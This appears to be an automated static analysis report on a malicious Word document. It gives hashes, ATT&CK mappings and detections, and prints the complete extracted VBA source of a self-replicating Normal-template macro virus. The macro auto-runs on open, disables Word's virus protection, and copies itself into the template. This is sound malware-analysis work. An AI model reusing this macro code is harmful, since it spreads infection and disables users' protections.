Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9993a50d476a01da…

MALICIOUS

Office (OLE)

Size: 33.5 KB
Created: 1997-09-17 08:18:00
Authoring application: Microsoft Word 9.0
First seen: 2012-10-03
MD5: 7d1b2de526fb0224fa52144fc25d2151
SHA-1: ee8f8ef40b3bd3eedf147f6ec42e5d14ff15d858
SHA-256: 9993a50d476a01da8240723ded007e74bf8ea798f9338debd0e743c26dd2d1b0
Risk score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that runs automatically when the document is opened, a common technique in malicious documents. The macro explicitly sets 'Options.VirusProtection = False', an attempt to disable Word's built-in macro virus protection. The ClamAV detection 'Heuristics.Macro.DisableVirusProtection-6136181-1' is triggered by exactly this behaviour. The macro's logic is that of a Normal-template infector: it checks whether the first line of the Normal template's code module carries the marker comment "'Please do NOT modify this file !"; if it does, the current document's macro code is replaced with the template's code, and if it does not, the template's module is overwritten with this document's code (prefixed by the marker) and both the template and the document are saved, so that every document subsequently created from the template carries the macro and can execute further code.

Heuristics (3)

  • ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
  • VBA macros detected [medium, OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document contains a Document_Open macro (auto-executes when the document is opened)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1168 bytes
SHA-256: c8124c3d2651203d39328b5cd1ed3f748af36070f5d459191ff59c7e7ec370d1

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Please do NOT modify this file !
Private Sub Document_Open()
On Error Resume Next

Options.VirusProtection = False

Set Active = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set Normal = NormalTemplate.VBProject.VBComponents(1).CodeModule

Dim mark As String
mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
If mark = "'Please do NOT modify this file !" Then

 Active.DeleteLines 1, Active.CountOfLines
 Active.InsertLines 1, Normal.Lines(1, Normal.CountOfLines)
 
Else
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, Normal.CountOfLines
Normal.InsertLines 1, "'Please do NOT modify this file !"
Normal.InsertLines 2, Active.Lines(2, Active.CountOfLines)
NormalTemplate.Save
ActiveDocument.Save
ThisDocument.Save


' [MOT] (C) Dr.Copy 1999

End If




End Sub